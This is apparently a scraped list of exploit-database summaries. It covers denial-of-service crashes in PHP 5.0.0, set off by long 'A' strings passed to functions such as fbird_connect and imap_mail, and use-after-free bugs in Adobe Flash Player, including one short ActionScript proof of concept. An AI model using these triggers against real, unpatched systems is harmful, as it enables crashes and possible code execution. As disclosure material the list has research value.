This exploit causes a denial of service in PHP 5.0.0 when the fbird_connect() or fbird_pconnect() functions are called with a string of 9999 'A' characters. This exploit was tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0.
This exploit causes a denial of service in PHP 5.0.0 when the snmpwalkoid() function is called with a string of 9999 'A's. This exploit was tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0.
This exploit causes a denial of service in PHP 5.0.0 when the html_doc_file() function is passed a string of 9999 'A's. This exploit was tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0. The bug was discovered by Yakir Wizman.
This exploit is for PHP 5.0.0 and it causes a Local Denial of Service. It requires the domxml extension to be loaded. The hw_docbyanchor() function is called with two parameters set to 0, which causes the Denial of Service.
This exploit causes a denial of service in PHP 5.0.0 when the imap_mail() function is called with a string of 9999 'A's as the first parameter.
There is a use-after-free in the MovieClip Transform getter. If the Transform constructor is replaced with a getter using addProperty, this getter can free the MovieClip before it is accessed. A minimal PoC is as follows: var mc = this.createEmptyMovieClip( "mc", 1); var tf = flash.geom.Transform; var g = flash.geom; g.addProperty("Transform", func, func); mc.f = ASnative(900, 419); mc.f(); function func(){ mc.removeMovieClip(); // Fix heap }
A use-after-free vulnerability exists in the BitmapData.copyPixels method of Adobe Flash Player. If the method is called on a MovieClip, and the MovieClip is deleted during parameter conversions, it is used to convert future parameters, even though it has already been freed. This can lead to arbitrary code execution.
Several methods in flash return instances of the Rectangle class. There is a use-after-free in creating these objects for return. If the this object of the call is a MovieClip, the Rectangle instantiation will run on its thread. If a getter is added to this class's package, it will be invoked when fetching the rectangle constructor, which can free the method's thread, which will cause the Rectangle constructor to run on a thread which has been freed.
When the setter is called, the parameter is converted to a string early, as a part of the new use-after-free prevention changes. This conversion can invoke script, which if the this object is a MovieClip, can delete the object, deleting the thread the call is made from, which can lead to a use-after-free.
There is a user-after-free in Selection.setFocus. It is a static method, but if it is called with a this object, it will be called on that object's thread. Then, if it calls into script, for example, by calling toString on the string parameter, the object, and its thread will be deleted, and a use-after-free occurs.
Services By CQR